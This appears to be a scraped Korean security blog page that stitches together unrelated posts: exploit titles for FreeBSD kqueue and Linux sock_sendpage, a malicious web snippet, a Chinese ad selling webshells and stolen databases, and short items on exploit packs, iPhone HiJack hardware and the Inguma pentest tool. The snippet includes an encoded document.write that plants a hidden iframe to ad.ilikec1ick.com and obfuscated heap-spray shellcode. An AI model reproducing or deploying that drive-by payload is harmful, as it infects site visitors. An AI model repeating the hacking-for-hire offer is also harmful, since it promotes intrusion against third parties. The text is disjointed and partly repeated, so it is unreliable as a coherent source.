테스트 버전 : FreeBSD 6.1
취약점 : FreeBSD 6.1 이하 버전에 kqueue() 함수의 Null Pointer 핸들링 취약점을 이용한 공격

테스트 버전 : FreeBSD 6.1
취약점 : FreeBSD 6.1 이하 버전에 kqueue() 함수의 Null Pointer 핸들링 취약점을 이용한 공격

리눅스 커널 2.4/2.6 버전의 sock_sendpage()함수의 버그를 이용한 root 권한 상승 취약점
출처는 이름 없는 여기저기 중국 보안블로그 사이트에서 찾다보니 있네요
Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.




| <script type="text/javascript" src="/js/banner.js"></script> |
| if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));} |
| <iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe> |

| <script> |
| document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>"); |
| var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var |
| (omitted) |
接单(拿SHELL 数据库 等等)
接单
地区:韩国 台湾 美国 等等(除国内)
类型:数据库(各种),webshell,渗透项目测试等等
要求:只接3000以上的单子 小单勿扰
找长期合作伙伴 无需定金,拿到后验证过付钱.
联系方式GT [email]Gxiboy@Gmail.com[/email] QQ:9 9 8 3 8 0 8
범죄에 이용할 목적으로 만들어 지는 이른바 criemware들은 최근 '익스프로잇 팩(Exploit Pack)'이라는 이름으로 블랙 마켓에서 거래가 되고 있다. Exploit Pack은 사용자 PC의 다양한 취약점을 이용하여 좀비 PC화 시키며 최근 가장 많이 악용되고 있는 것은 어도비 제품들이다.
스티브 잡스가 어도비를 애플에서 채택하지 않은 이유는 나름 이유가 있겠지만 단지 경쟁회사 제품이기때문은 아닐 거 같다.
해커들의 가장 좋은 멋잇감으로 지속적으로 취약점이 나오고 있으며 취약점을 악용한 Exploit Pack에서 가장 인기 있는 공격대상이 되기도 한다. 스티브 잡스는 어도비 프로그램을 리소스 잡아먹는 지저분한 프로그램이라고 혹평을 한 바 있다.
'Exploit Pack'은 러시아나 동유럽 해커들이 주로 만드는 것으로 추정되며 대부분 php로 제작되는 것이 특징이다.
아래 그림을 보면 꽤 유명한 Mpack, BleedingLife 등 Exploit Pack들이 애용하는 취약점이 MS IE와 Adobe Acrobat, Flash다.



애플의 아이폰 독 연결장치와 관련해 주변기기를 제작할 수 있는 다른 방법이 소개되었습니다. 혹시 스퀘어(Square) 신용 카드 인식기를 아이폰의 3.5mm 헤드폰잭에 꼽으면 전원이 켜지고 데이터가 전송되는 걸 보신 분 있을지도 모르겠지만, 요즘 미시간 대학의 가제티어(Gadgetteers)들은 각종의 DIY 기계들이 같은 테크닉을 사용할 수 있도록 소프트웨어의 소스를 공개하였습니다. 하이잭 프로젝트 팀은 이미 22kHz의 오디오톤에서 7.4밀리와트를 전력을 이용하는 방법을 알아냈고, EKG, 온도, 습도, 모션센서등 여러 가지 프로토타입 보드 시리즈도 만들었습니다. 이 보드들은 데이터를 OS 앱으로부터 8.82 kbaud로 전송할 수 있는데, $2.34(약 2,800원)정도의 재료비만 있으면 가능하다고 합니다. 위에 첨부된 동영상에서 어떻게 전력이 이용되는지 확인할 수 있는데, 관심이 있으신 분은 아래 링크에는여러분이 직접 만들수 있는 설명(영문)이 첨부되었습니다.
(원출처) http://kr.engadget.com/2011/01/19/iphone/
http://player.vimeo.com/video/14453136
Inguma는 오픈소스로 개발되던 자동 모의침투 툴로서 2008년도를 끝으로 프로젝트가 중단되었다가 최근에 다시 개발이 진행중인 오픈소스 프로젝트입니다.
새 버전이 거의 3년 만에 발표되었으며 몇가지 중요한 변화로 GUI 환경으로 재 탄생하였습니다.
Inguma는 기본 구성이 Python으로 개발된 Penetration testing toolkit입니다.
제 개인적인 생각으로는 CAVNAS와 유사한 것 같습니다. 물론 상용 제품에 비해 아직 많이 기능이 부족합니다.
주요 모듈 기능
- Discover hosts 및 정보 수집, fuzz
- 사용자 이름 및 패스워드 brute force 그리고 exploits.
download Inguma 0.2 here: inguma-0.2.tar.gz
더 자세한 것은 여기로 here.
블로그 : http://ingumadev.blogspot.com/2011/01/we-are-back.html
소스코드 레포지터리 : http://code.google.com/p/inguma/


최근 덧글